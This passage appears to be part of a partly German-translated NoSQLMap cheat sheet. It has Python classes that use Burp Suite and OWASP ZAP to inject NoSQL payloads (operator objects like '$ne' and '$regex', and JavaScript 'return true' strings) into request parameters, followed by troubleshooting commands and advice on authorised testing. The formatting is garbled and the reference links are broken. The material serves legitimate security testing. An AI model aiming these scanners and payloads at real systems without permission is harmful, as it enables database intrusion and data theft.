class BurpNoSQLIntegration: def init(self, burp_proxy="http://127.0.0.1:8080"): self.burp_proxy = burp_proxy self.session = requests.Session() self.session.proxies = \\{"http": burp_proxy, "https": burp_proxy\\} self.session.verify = False # Disable SSL verification for Burp

def import_burp_request(self, burp_request_file):
    """Import request from Burp Suite"""

    with open(burp_request_file, 'r') as f:
        request_data = f.read()

    # Parse Burp request format
    lines = request_data.split('\n')

    # Extract method, URL, and headers
    request_line = lines[0]
    method, path, protocol = request_line.split(' ')

    headers = \\\\{\\\\}
    body = ""
    body_start = False

    for line in lines[1:]:
        if line.strip() == "":
            body_start = True
            continue

        if body_start:
            body += line + '\n'
        else:
            if ':' in line:
                key, value = line.split(':', 1)
                headers[key.strip()] = value.strip()

    # Extract host from headers
    host = headers.get('Host', '')

    # Construct full URL
    scheme = "https" if "443" in host else "http"
    url = f"\\\\{scheme\\\\}://\\\\{host\\\\}\\\\{path\\\\}"

    return \\\\{
        "method": method,
        "url": url,
        "headers": headers,
        "body": body.strip()
    \\\\}

def test_nosql_injection(self, request_data):
    """Test for NoSQL injection in Burp request"""

    results = []

    # Test URL parameters
    parsed_url = urlparse(request_data["url"])
    if parsed_url.query:
        params = parse_qs(parsed_url.query)

        for param_name, param_values in params.items():
            for param_value in param_values:
                result = self.test_parameter(
                    request_data,
                    param_name,
                    param_value,
                    "url"
                )
                if result:
                    results.append(result)

    # Test POST body parameters
    if request_data["method"] == "POST" and request_data["body"]:
        content_type = request_data["headers"].get("Content-Type", "")

        if "application/json" in content_type:
            results.extend(self.test_json_body(request_data))
        elif "application/x-www-form-urlencoded" in content_type:
            results.extend(self.test_form_body(request_data))

    return results

def test_parameter(self, request_data, param_name, param_value, param_type):
    """Test individual parameter for NoSQL injection"""

    # NoSQL injection payloads
    payloads = [
        \\\\{"$ne": ""\\\\},
        \\\\{"$gt": ""\\\\},
        \\\\{"$regex": ".*"\\\\},
        \\\\{"$exists": True\\\\},
        "'; return true; //",
        "\"; return true; //",
        "true, true"
    ]

    for payload in payloads:
        # Modify request with payload
        modified_request = self.inject_payload(
            request_data,
            param_name,
            payload,
            param_type
        )

        # Send request through Burp
        try:
            response = self.send_request(modified_request)

            # Analyze response for injection indicators
            if self.analyze_response(response, request_data):
                return \\\\{
                    "parameter": param_name,
                    "parameter_type": param_type,
                    "payload": payload,
                    "vulnerable": True,
                    "response_length": len(response.text),
                    "status_code": response.status_code
                \\\\}

        except Exception as e:
            print(f"Error testing parameter \\\\{param_name\\\\}: \\\\{e\\\\}")

    return None

def inject_payload(self, request_data, param_name, payload, param_type):
    """Inject payload into request parameter"""

    modified_request = request_data.copy()

    if param_type == "url":
        # Modify URL parameter
        parsed_url = urlparse(request_data["url"])
        params = parse_qs(parsed_url.query)

        if isinstance(payload, dict):
            params[param_name] = [json.dumps(payload)]
        else:
            params[param_name] = [str(payload)]

        # Reconstruct URL
        new_query = "&".join([f"\\\\{k\\\\}=\\\\{v[0]\\\\}" for k, v in params.items()])
        modified_request["url"] = f"\\\\{parsed_url.scheme\\\\}://\\\\{parsed_url.netloc\\\\}\\\\{parsed_url.path\\\\}?\\\\{new_query\\\\}"

    elif param_type == "json":
        # Modify JSON body
        try:
            body_data = json.loads(request_data["body"])
            body_data[param_name] = payload
            modified_request["body"] = json.dumps(body_data)
        except:
            pass

    return modified_request

def send_request(self, request_data):
    """Send request through Burp proxy"""

    if request_data["method"] == "GET":
        response = self.session.get(
            request_data["url"],
            headers=request_data["headers"]
        )
    elif request_data["method"] == "POST":
        response = self.session.post(
            request_data["url"],
            headers=request_data["headers"],
            data=request_data["body"]
        )
    else:
        response = self.session.request(
            request_data["method"],
            request_data["url"],
            headers=request_data["headers"],
            data=request_data["body"]
        )

    return response

def analyze_response(self, response, original_request):
    """Analyze response for injection indicators"""

    # Check for error messages indicating injection
    error_indicators = [
        "MongoError",
        "CouchDB",
        "Redis",
        "NoSQL",
        "JSON.parse",
        "SyntaxError",
        "unexpected token"
    ]

    response_text = response.text.lower()

    for indicator in error_indicators:
        if indicator.lower() in response_text:
            return True

    # Check for significant response length differences
    # This would require baseline response for comparison

    return False

Usage

if name == "main": integration = BurpNoSQLIntegration()

# Import request from Burp
request_data = integration.import_burp_request("burp_request.txt")

# Test for NoSQL injection
results = integration.test_nosql_injection(request_data)

# Print results
for result in results:
    if result["vulnerable"]:
        print(f"Vulnerable parameter found: \\\\{result['parameter']\\\\}")
        print(f"Payload: \\\\{result['payload']\\\\}")

```_

OWASP ZAP Integration

```python

!/usr/bin/env python3

NoSQLMap integration with OWASP ZAP

from zapv2 import ZAPv2 import time import json

class ZAPNoSQLIntegration: def init(self, zap_proxy="http://127.0.0.1:8080"): self.zap = ZAPv2(proxies=\\{'http': zap_proxy, 'https': zap_proxy\\}) self.nosql_payloads = self.load_nosql_payloads()

def load_nosql_payloads(self):
    """Load NoSQL injection payloads"""
    return [
        '\\\\{"$ne":""\\\\}',
        '\\\\{"$gt":""\\\\}',
        '\\\\{"$regex":".*"\\\\}',
        '\\\\{"$exists":true\\\\}',
        "'; return true; //",
        '"; return true; //',
        "true, true",
        "false, true"
    ]

def spider_target(self, target_url):
    """Spider target to discover endpoints"""
    print(f"Spidering target: \\\\{target_url\\\\}")

    # Start spider
    spider_id = self.zap.spider.scan(target_url)

    # Wait for spider to complete
    while int(self.zap.spider.status(spider_id)) < 100:
        print(f"Spider progress: \\\\{self.zap.spider.status(spider_id)\\\\}%")
        time.sleep(5)

    print("Spider completed")

    # Get discovered URLs
    urls = self.zap.core.urls()
    return urls

def test_nosql_injection(self, target_url):
    """Test target for NoSQL injection vulnerabilities"""

    # Spider target first
    urls = self.spider_target(target_url)

    vulnerabilities = []

    for url in urls:
        print(f"Testing URL: \\\\{url\\\\}")

        # Get URL parameters
        params = self.get_url_parameters(url)

        for param in params:
            for payload in self.nosql_payloads:
                # Test parameter with payload
                result = self.test_parameter_injection(url, param, payload)

                if result:
                    vulnerabilities.append(result)

    return vulnerabilities

def get_url_parameters(self, url):
    """Extract parameters from URL"""
    from urllib.parse import urlparse, parse_qs

    parsed = urlparse(url)
    params = parse_qs(parsed.query)

    return list(params.keys())

def test_parameter_injection(self, url, parameter, payload):
    """Test specific parameter for injection"""

    # Modify URL with payload
    modified_url = self.inject_payload_in_url(url, parameter, payload)

    # Send request through ZAP
    try:
        response = self.zap.core.send_request(modified_url)

        # Analyze response
        if self.analyze_nosql_response(response):
            return \\\\{
                "url": url,
                "parameter": parameter,
                "payload": payload,
                "vulnerable": True,
                "response": response
            \\\\}

    except Exception as e:
        print(f"Error testing \\\\{url\\\\} with payload \\\\{payload\\\\}: \\\\{e\\\\}")

    return None

def inject_payload_in_url(self, url, parameter, payload):
    """Inject payload into URL parameter"""
    from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

    parsed = urlparse(url)
    params = parse_qs(parsed.query)

    # Inject payload
    params[parameter] = [payload]

    # Reconstruct URL
    new_query = urlencode(params, doseq=True)
    new_parsed = parsed._replace(query=new_query)

    return urlunparse(new_parsed)

def analyze_nosql_response(self, response):
    """Analyze response for NoSQL injection indicators"""

    # Check for error messages
    error_indicators = [
        "MongoError",
        "CouchDB",
        "Redis",
        "NoSQL",
        "JSON.parse",
        "SyntaxError"
    ]

    response_text = response.lower()

    for indicator in error_indicators:
        if indicator.lower() in response_text:
            return True

    return False

def generate_zap_report(self, vulnerabilities, output_file="zap_nosql_report.html"):
    """Generate ZAP-style report for NoSQL vulnerabilities"""

    # Add custom alerts to ZAP
    for vuln in vulnerabilities:
        self.zap.core.add_alert(
            risk="High",
            confidence="Medium",
            name="NoSQL Injection",
            description=f"NoSQL injection vulnerability found in parameter \\\\{vuln['parameter']\\\\}",
            url=vuln["url"],
            param=vuln["parameter"],
            evidence=vuln["payload"]
        )

    # Generate HTML report
    report = self.zap.core.htmlreport()

    with open(output_file, 'w') as f:
        f.write(report)

    print(f"Report generated: \\\\{output_file\\\\}")

Usage

if name == "main": zap_integration = ZAPNoSQLIntegration()

target_url = "http://example.com"

# Test for NoSQL injection
vulnerabilities = zap_integration.test_nosql_injection(target_url)

# Generate report
zap_integration.generate_zap_report(vulnerabilities)

print(f"Found \\\\{len(vulnerabilities)\\\\} NoSQL injection vulnerabilities")

```_

Fehlerbehebung

Gemeinsame Themen

Installationsprobleme: ```bash

Python dependency issues

pip install --upgrade pip pip install --upgrade setuptools wheel

Permission issues

pip install --user nosqlmap

Virtual environment issues

python3 -m venv nosqlmap-env source nosqlmap-env/bin/activate pip install nosqlmap

Missing system dependencies

sudo apt install python3-dev libffi-dev libssl-dev ```_

Anmeldefragen: ```bash

Proxy configuration

nosqlmap --target http://example.com --proxy http://127.0.0.1:8080

SSL/TLS issues

nosqlmap --target https://example.com --disable-ssl-verification

Timeout issues

nosqlmap --target http://example.com --timeout 30

User agent issues

nosqlmap --target http://example.com --user-agent "Custom Agent" ```_

Datenbasis-spezifische Fragen: ```bash

MongoDB connection issues

Check MongoDB version compatibility

Verify authentication requirements

Check network connectivity

CouchDB access issues

Verify CouchDB version

Check authentication settings

Validate view permissions

Redis connection problems

Check Redis configuration

Verify authentication

Test network connectivity

```_

Debugging

Debugging und Protokollierung aktivieren:

```bash

Verbose output

nosqlmap --target http://example.com --verbose

Debug mode

nosqlmap --target http://example.com --debug

Save all requests/responses

nosqlmap --target http://example.com --save-requests

Custom logging

nosqlmap --target http://example.com --log-file nosql_debug.log

Network debugging

nosqlmap --target http://example.com --proxy http://127.0.0.1:8080 --verbose ```_

Sicherheitsüberlegungen

Verantwortliche Prüfung

Autorisierung: - Nur Testsysteme, die Sie besitzen oder eine ausdrückliche Genehmigung zur Prüfung haben - Erhalten Sie eine ordnungsgemäße schriftliche Genehmigung vor der Prüfung - Einschränkungen der Reichweite und Prüffenster - Alle Prüftätigkeiten

Impact Minimierung: - Verwenden Sie nur Lesevorgänge, wenn möglich - Vermeiden Sie destruktive Nutzlasten in Produktionsumgebungen - Ergänzende Rate begrenzt DoS - Überwachung der Systemauswirkungen bei der Prüfung

Recht und Compliance

Rechtsvorschriften: - Erfüllung geltender Gesetze und Vorschriften - Einhaltung der Nutzungsbedingungen - Vertraulichkeit der entdeckten Schwachstellen bewahren - Verantwortliche Offenlegungspraktiken

Beste Praktiken: - Verwenden Sie dedizierte Testumgebungen, wenn möglich - Implementierung richtiger Zugriffskontrollen für Prüfwerkzeuge - Sichere Speicherung der Testergebnisse und Nachweise - Regelmäßiges Sicherheitstraining und Bewusstsein

Referenzen

  1. NoSQLMap GitHub Repository
  2. [OWASP NoSQL Injection](__LINK_5___
  3. [MongoDB Sicherheitskontrollliste](LINK_5
  4. [CouchDB Security Features](__LINK_5___
  5. [Redis Security](_LINK_5__